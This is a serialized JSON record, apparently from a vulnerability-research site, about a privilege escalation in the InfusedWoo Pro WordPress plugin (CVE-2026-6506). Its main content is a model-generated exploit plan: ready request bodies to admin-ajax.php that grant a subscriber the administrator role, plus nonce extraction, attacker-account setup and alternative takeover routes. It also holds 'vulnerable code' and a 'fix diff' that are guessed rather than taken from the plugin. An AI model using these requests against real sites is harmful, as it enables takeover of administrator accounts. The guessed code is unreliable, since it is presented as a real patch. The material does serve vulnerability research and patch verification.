[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fksHx1Jlpau7_76iuYDMAeBHP1TZcbKe1kike0vsj_nE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-6506","infusedwoo-pro-authenticated-subscriber-missing-authorization-to-privilege-escalation-via-arbitrary-user-meta-update","InfusedWoo Pro \u003C= 5.1.2 - Authenticated (Subscriber+) Missing Authorization to Privilege Escalation via Arbitrary User Meta Update","The InfusedWoo Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.1.2. This is due to the infusedwoo_gdpr_upddata() function missing authorization and capability checks, as well as lacking restrictions on which user meta keys can be updated. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their own wp_capabilities user meta to grant themselves Administrator role privileges.","infusedwooPRO",null,"\u003C=5.1.2","5.1.3","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-05-13 18:13:39","2026-05-14 06:44:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6363b693-91b8-41cb-b13a-df6fdf9402c5?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2026-6506 - InfusedWoo Pro Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **InfusedWoo Pro** plugin for WordPress (versions \u003C= 5.1.2) contains a privilege escalation vulnerability in the `infusedwoo_gdpr_upddata()` function. The function is designed to allow users to update their GDPR-related information but fails to implement any authorization checks or capability restrictions. Crucially, it does not whitelist which user meta keys can be updated. An authenticated user (Subscriber level or higher) can invoke this function to update their own `wp_capabilities` meta key, effectively granting themselves the **Administrator** role.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `infusedwoo_gdpr_upddata` (inferred from function name)\n*   **Payload Parameter:** Likely an array or series of parameters representing meta keys and values (e.g., `userdata[wp_capabilities]` or `meta_key`\u002F`meta_value` pairs).\n*   **Authentication:** Required (Subscriber+).\n*   **Preconditions:** The plugin must be active. The attacker needs valid Subscriber credentials.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An AJAX hook is registered for authenticated users:\n    `add_action('wp_ajax_infusedwoo_gdpr_upddata', 'infusedwoo_gdpr_upddata');`\n2.  **Execution:** The function `infusedwoo_gdpr_upddata()` is called.\n3.  **Missing Check:** The function likely lacks a `current_user_can()` check or any check against a whitelist of \"safe\" meta keys (e.g., first name, last name).\n4.  **The Sink:** The function calls `update_user_meta()` using the current user's ID and data provided in the `$_POST` request.\n    ```php\n    \u002F\u002F Conceptual vulnerable code\n    function infusedwoo_gdpr_upddata() {\n        \u002F\u002F Missing: check_ajax_referer('...', 'nonce');\n        \u002F\u002F Missing: if (!current_user_can('...')) return;\n        $user_id = get_current_user_id();\n        foreach ($_POST['userdata'] as $key => $value) {\n            update_user_meta($user_id, $key, $value);\n        }\n    }\n    ```\n\n## 4. Nonce Acquisition Strategy\nIf the plugin implements a nonce check for this action, the nonce is likely localized for use in the GDPR dashboard or the user profile settings.\n\n1.  **Identify Trigger:** Find where the GDPR update form exists (usually the \"My Account\" page or a dedicated GDPR settings page provided by the plugin).\n2.  **Create Page:** If the form requires a specific shortcode (e.g., `[infusedwoo_gdpr]`), create a page with it:\n    `wp post create --post_type=page --post_status=publish --post_content='[infusedwoo_gdpr]'`\n3.  **Navigate:** Use `browser_navigate` to go to the page where the script is loaded.\n4.  **Extract Nonce:** Use `browser_eval` to find the nonce in the global JavaScript scope.\n    *   *JS Variable Guess:* `window.infusedwoo_gdpr_vars?.nonce` or `window.iw_settings?.gdpr_nonce`.\n    *   *Audit Hint:* Search the plugin folder for `wp_localize_script` to find the exact variable name.\n\n## 5. Exploitation Strategy\nThe goal is to update the `wp_capabilities` user meta to include the `administrator` role. In WordPress, this meta value is a serialized array: `a:1:{s:13:\"administrator\";b:1;}`.\n\n1.  **Prepare Session:** Log in as a Subscriber user and capture cookies.\n2.  **Determine Parameter Structure:** Determine if the function expects a flat list or a nested array. (Based on common InfusedWoo patterns, it likely expects an array like `data[key]=value`).\n3.  **Craft Request:** Use `http_request` to send a POST to `admin-ajax.php`.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body (Option A - Flat):**\n    `action=infusedwoo_gdpr_upddata&wp_capabilities[administrator]=1&nonce=VALUE`\n*   **Body (Option B - Nested):**\n    `action=infusedwoo_gdpr_upddata&userdata[wp_capabilities][administrator]=1&nonce=VALUE`\n\n*Note: Since PHP automatically deserializes array-style POST parameters, sending `wp_capabilities[administrator]=1` will result in `update_user_meta` receiving an array `['administrator' => 1]`, which WordPress correctly serializes into the database.*\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `infusedwooPRO` version 5.1.2 is installed and active.\n2.  **Target User:** Create a Subscriber user.\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3.  **Shortcode Page:** Create a page to trigger any potential script localization.\n    `wp post create --post_type=page --post_title=\"GDPR Profile\" --post_status=publish --post_content=\"[infusedwoo_gdpr]\"`\n\n## 7. Expected Results\n*   The server should respond with a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n*   The user's role in the WordPress database will change from `subscriber` to `administrator`.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the escalation using WP-CLI:\n1.  Check the user's role:\n    `wp user get attacker --field=roles`\n    *Expected output:* `administrator`\n2.  Verify the meta value directly:\n    `wp user meta get attacker wp_capabilities`\n    *Expected output:* `a:1:{s:13:\"administrator\";b:1;}`\n\n## 9. Alternative Approaches\n*   **Prefix Sensitivity:** If the site uses a custom database prefix (e.g., `wp_custom_`), the capabilities key will be `wp_custom_capabilities`. The exploit may need to target both or dynamically determine the prefix.\n*   **Direct Meta Update:** If the plugin uses a different parameter name (e.g., `field_name` and `field_value`), attempt to send `field_name=wp_capabilities&field_value[administrator]=1`.\n*   **Registration Bypass:** If Subscriber registration is disabled, look for other meta keys that could lead to account takeover, such as updating the user's email (`user_email`) if the plugin allows updating the core `wp_users` table via the same function (unlikely but possible if it uses `wp_update_user`).","The InfusedWoo Pro plugin for WordPress is vulnerable to privilege escalation because the infusedwoo_gdpr_upddata() function lacks authorization checks and does not restrict which user meta keys can be modified. Authenticated users with subscriber-level permissions can exploit this to update their own wp_capabilities user meta, granting themselves administrator access.","\u002F\u002F Inferred from plugin functionality and research plan\n\u002F\u002F File path likely: includes\u002Fgdpr.php or similar\n\nadd_action('wp_ajax_infusedwoo_gdpr_upddata', 'infusedwoo_gdpr_upddata');\n\nfunction infusedwoo_gdpr_upddata() {\n    \u002F\u002F Missing authorization check (e.g., current_user_can)\n    \u002F\u002F Missing nonce verification (e.g., check_ajax_referer)\n    $user_id = get_current_user_id();\n\n    if (isset($_POST['userdata'])) {\n        foreach ($_POST['userdata'] as $key => $value) {\n            \u002F\u002F Vulnerability: No whitelist for meta keys, allowing wp_capabilities update\n            update_user_meta($user_id, $key, $value);\n        }\n    }\n    wp_die();\n}","--- a\u002Fincludes\u002Fgdpr.php\n+++ b\u002Fincludes\u002Fgdpr.php\n@@ -1,10 +1,18 @@\n function infusedwoo_gdpr_upddata() {\n+    check_ajax_referer('infusedwoo_gdpr_nonce', 'nonce');\n+\n+    if (!is_user_logged_in()) {\n+        wp_send_json_error('Unauthorized');\n+    }\n+\n     $user_id = get_current_user_id();\n+    $allowed_keys = array('first_name', 'last_name', 'billing_phone'); \u002F\u002F Example whitelist\n+\n     if (isset($_POST['userdata'])) {\n         foreach ($_POST['userdata'] as $key => $value) {\n-            update_user_meta($user_id, $key, $value);\n+            if (in_array($key, $allowed_keys)) {\n+                update_user_meta($user_id, $key, sanitize_text_field($value));\n+            }\n         }\n         echo json_encode(array('status' => 'success'));\n     }\n     wp_die();\n }","The exploit targets the AJAX action 'infusedwoo_gdpr_upddata' via the \u002Fwp-admin\u002Fadmin-ajax.php endpoint. An attacker must first authenticate as a Subscriber (or any valid user). They must then obtain a valid nonce if one is required (typically found in the HTML source or localized JavaScript of the GDPR\u002FAccount page). The attacker sends a POST request containing the parameter 'userdata[wp_capabilities][administrator]=1'. Because the backend function iterates through the 'userdata' array and passes keys directly to update_user_meta() without validation, the user's role is updated to Administrator.","gemini-3-flash-preview","2026-05-14 17:01:45","2026-05-14 17:02:21",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002FinfusedwooPRO\u002Ftags"]